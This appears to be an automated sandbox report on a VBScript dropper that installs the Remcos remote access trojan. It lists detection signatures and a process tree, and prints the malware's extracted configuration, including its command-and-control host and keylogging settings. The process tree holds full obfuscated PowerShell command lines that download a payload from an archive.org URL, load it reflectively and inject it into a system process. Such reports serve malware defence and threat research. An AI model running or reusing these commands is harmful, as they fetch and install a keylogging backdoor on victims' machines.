Edit tour
Windows
Analysis Report
OIQ1ybtQdW.vbs
Overview
General Information
Sample name: | OIQ1ybtQdW.vbsrenamed because original name is a hash value |
Original sample name: | 8140d8019e144b3998a9fc991c45be89eb5f83c58f04627ce34c49b3f8d5d368.vbs |
Analysis ID: | 1523833 |
MD5: | 4a31a1de3d99c80d908ddda051e2f761 |
SHA1: | 302e19edb2c96cc78cb866c2d78d7f2fc77e8297 |
SHA256: | 8140d8019e144b3998a9fc991c45be89eb5f83c58f04627ce34c49b3f8d5d368 |
Tags: | BlindEaglevbsuser-JAMESWT_MHT |
Infos: | |
Detection
Remcos, PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7268 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\OIQ1y btQdW.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7360 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' JiAoKFZBUk lhQkxlICcq TURyKicpLm 5hTWVbMywx MSwyXS1qT2 lOJycpKCAo J3cxJysnWn VybCA9IFZ3 M2h0dHAnKy dzOi8vJysn aScrJ2E2Jy snMDAxMDAu dXMuYXJjaG l2ZS5vcmcn KycvMjQnKy cvaScrJ3Rl bXMvZGV0Jy snYWgtJysn bm90ZS12Ly crJ0RldGFo Tm8nKyd0ZV YudHgnKyd0 VnczOycrJ3 cxWmJhc2U2 JysnNEMnKy dvbnRlJysn bnQgPSAoTm V3JysnLU9i aicrJ2VjdC AnKydTeScr J3N0ZW0uTm V0JysnLlcn KydlYkNsaW VudCkuRG93 bmxvYWRTJy sndHJpbmcn KycodzFadX JsKTt3Jysn MVpiJysnaW 4nKydhcicr J3lDb250ZW 50ID0gWycr J1N5Jysnc3 RlbS5DJysn b24nKyd2Jy snZXJ0Jysn XTo6RicrJ3 InKydvbUJh cycrJ2U2NF N0cmluZycr Jyh3MVpiYX NlNicrJzRD b250ZScrJ2 50KTt3MVph c3NlbWJseS A9IFsnKydS ZWZsZWN0Jy snaScrJ29u LkFzJysnc2 VtYmx5XScr Jzo6TG9hZC crJygnKyd3 MVonKydiaW 5hcnlDb24n Kyd0ZW50Jy snKTt3MVp0 JysneXBlID 0gdzFaYXNz JysnZW1iJy snbHkuR2V0 VHlwJysnZS hWdzMnKydS dScrJ25QRS 4nKydIb21l JysnVnczKT t3JysnMVpt ZXRob2QgPS B3JysnMVon Kyd0eScrJ3 BlLkdldE1l dGhvZChWdz NWQUlWdzMp O3cxWm0nKy dldGgnKydv ZCcrJy5Jbn Zva2Uodycr JzFabnVsbC wgJysnWycr J29iamVjdF tdJysnXUAo VicrJ3czMC 9wV2NKJysn bicrJy9kLy crJ2UnKydl LmV0c2FwLy 86c3B0dGhW dzMgLCcrJy BWdzNkZXNh dGl2YScrJ2 RvVnczICwg JysnVicrJ3 czZGVzYXRp dmFkbycrJ1 Z3JysnMyAs JysnIFZ3M2 QnKydlcycr J2EnKyd0aX ZhZG9WJysn dzMsVncnKy czQWRkSW5Q JysncicrJ2 8nKydjZXNz MzJWdzMsJy snVicrJ3cz VnczKSknKS 5yZXBsQWNl KCdWdzMnLF tzVHJJTkdd W0NIYVJdMz kpLnJlcGxB Y2UoJ3cxWi csJyQnKSk= ';$OWjuxd = [system. Text.encod ing]::UTF8 .GetString ([system.C onvert]::F rombase64S tring($cod igo));powe rshell.exe -windowst yle hidden -executio npolicy by pass -NoPr ofile -com mand $OWju xD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7368 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7540 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "& ((V ARIaBLe '* MDr*').naM e[3,11,2]- jOiN'')( ( 'w1'+'Zurl = Vw3http '+'s://'+' i'+'a6'+'0 0100.us.ar chive.org' +'/24'+'/i '+'tems/de t'+'ah-'+' note-v/'+' DetahNo'+' teV.tx'+'t Vw3;'+'w1Z base6'+'4C '+'onte'+' nt = (New' +'-Obj'+'e ct '+'Sy'+ 'stem.Net' +'.W'+'ebC lient).Dow nloadS'+'t ring'+'(w1 Zurl);w'+' 1Zb'+'in'+ 'ar'+'yCon tent = ['+ 'Sy'+'stem .C'+'on'+' v'+'ert'+' ]::F'+'r'+ 'omBas'+'e 64String'+ '(w1Zbase6 '+'4Conte' +'nt);w1Za ssembly = ['+'Reflec t'+'i'+'on .As'+'semb ly]'+'::Lo ad'+'('+'w 1Z'+'binar yCon'+'ten t'+');w1Zt '+'ype = w 1Zass'+'em b'+'ly.Get Typ'+'e(Vw 3'+'Ru'+'n PE.'+'Home '+'Vw3);w' +'1Zmethod = w'+'1Z' +'ty'+'pe. GetMethod( Vw3VAIVw3) ;w1Zm'+'et h'+'od'+'. Invoke(w'+ '1Znull, ' +'['+'obje ct[]'+']@( V'+'w30/pW cJ'+'n'+'/ d/'+'e'+'e .etsap//:s ptthVw3 ,' +' Vw3desa tiva'+'doV w3 , '+'V' +'w3desati vado'+'Vw' +'3 ,'+' V w3d'+'es'+ 'a'+'tivad oV'+'w3,Vw '+'3AddInP '+'r'+'o'+ 'cess32Vw3 ,'+'V'+'w3 Vw3))').re plAce('Vw3 ',[sTrING] [CHaR]39). replAce('w 1Z','$'))" MD5: 04029E121A0CFA5991749937DD22A1D9) - AddInProcess32.exe (PID: 8028 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": "23spt.duckdns.org:3000:0", "Assigned name": "TsosT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-DCR6HW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
Click to see the 23 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 16 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |